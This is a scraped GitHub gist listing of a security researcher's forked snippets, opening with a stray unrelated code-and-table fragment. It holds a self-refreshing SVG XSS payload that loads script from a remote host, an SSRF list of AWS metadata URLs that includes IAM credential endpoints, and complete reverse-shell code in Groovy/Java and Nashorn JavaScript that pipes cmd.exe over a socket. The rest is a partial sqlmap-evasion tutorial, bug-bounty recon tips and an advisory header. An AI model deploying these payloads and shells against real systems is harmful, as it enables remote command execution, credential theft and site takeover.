JavaScript Code
var str = "hi";Memory allocation:
| Address | Value | Description |
|---|---|---|
...... |
... |
Nur Gucu nuryslyrt
🌟
nuryslyrt
/ XSS-payload.html
Created
February 26, 2018 20:55
— forked from bl4de/XSS-payload.html
Remote XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s); | |
| setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()> |
nuryslyrt
/ cloud_metadata.txt
Created
December 21, 2017 14:03
— forked from 0xBADCA7/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
nuryslyrt
/ Beat dynamic parameters with SQLMap.md
Created
December 21, 2017 14:03
Beat dynamic parameters with SQLMap
In the [previous][1] post I have written about a simple method of deterring automated tools like sqlmap from being run against your application. I have argued that having some client-side JavaScript code that dynamically mangles form fields' name attribute can help a lot (prevent automated calls to DB via your app) when it comes to SQL-injection discovery (provided that the attacker is not-so-determined). Now let's take another side - one of an attacker - and try to circumvent that protection.
First of all, one has to determine what is actually being sent to the server in the end. In the [example][2] from the aforementioned [post][1] we have simulated a very simple mechanism implemented at the client side:
function submitForm()
{
var u = document.getElementById('username');
var p = document.getElementById('password');
var ts = (new Date()).getTime().toString().substr(0, 10);
nuryslyrt
/ github_bugbountyhunting.md
Created
November 21, 2017 17:00
— forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
nuryslyrt
/ keybase.md
Created
November 17, 2017 11:02
I hereby claim:
- I am nuryslyrt on github.
- I am y3nn3f3r (https://keybase.io/y3nn3f3r) on keybase.
- I have a public key ASAw-mnp2AWSYZ_QDP5DaEJB40PBa1MyO8QVTwXPUSJfjAo
To claim this, I am signing this object:
nuryslyrt
/ SharedServerSocketPortExample.java
Created
November 15, 2017 01:25
— forked from thomasdarimont/SharedServerSocketPortExample.java
Example to demonstrate sharing of ServerSocket ports with Java 9
nuryslyrt
/ JAVA-ADVISORY.md
Created
October 14, 2017 23:24
— forked from frohoff/JAVA-ADVISORY.md
Java 7u21 Security Advisory
Chris Frohoff – Qualcomm Information Security and Risk Management
- Affected Product(s): Java SE 6, Java SE 7
- Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
- Vendor Contact: [email protected]
- Vulnerability Type: Unsafe Object Deserialization
nuryslyrt
/ revsh.groovy
Created
October 14, 2017 23:23
— forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
nuryslyrt
/ revsh.js
Created
October 14, 2017 23:22
— forked from frohoff/revsh.js
Nashorn Javascript Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var host="localhost"; | |
| var port=8044; | |
| var cmd="cmd.exe"; | |
| var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close(); |